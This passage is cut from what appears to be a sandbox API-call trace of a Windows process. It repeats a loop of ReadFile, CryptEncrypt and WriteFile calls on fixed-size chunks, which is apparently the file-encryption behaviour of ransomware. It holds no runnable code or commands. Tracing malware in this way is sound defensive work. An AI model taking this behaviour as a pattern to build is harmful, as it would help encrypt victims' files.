lpOverlapped=0x0) returned 1 [0268.644] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.644] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.644] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.645] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.645] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.645] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.645] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.645] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.645] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.645] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.645] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.645] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.645] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.645] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.645] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.645] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.645] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.645] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.646] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.646] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.646] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.646] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.646] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.646] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.646] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.646] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.646] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.646] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.646] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.646] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.646] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.647] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.647] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.647] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.647] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.647] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.647] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.647] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.647] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.647] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.647] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.647] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.647] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.647] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.648] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.648] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.648] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.648] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.648] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.648] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.648] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.648] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.648] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.648] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.648] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.648] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.649] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.649] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.649] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.649] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.649] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.649] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.649] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.649] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.649] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.649] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.649] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.649] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.649] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.650] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.650] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.650] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.650] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.650] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.650] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.650] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.650] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.650] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.650] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.650] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.651] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.651] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.651] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.651] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.651] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.651] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.651] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.651] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.651] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.651] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.651] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.651] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.651] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.651] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.652] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.652] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.652] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.652] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.652] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.652] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.652] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.652] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.652] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.652] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, 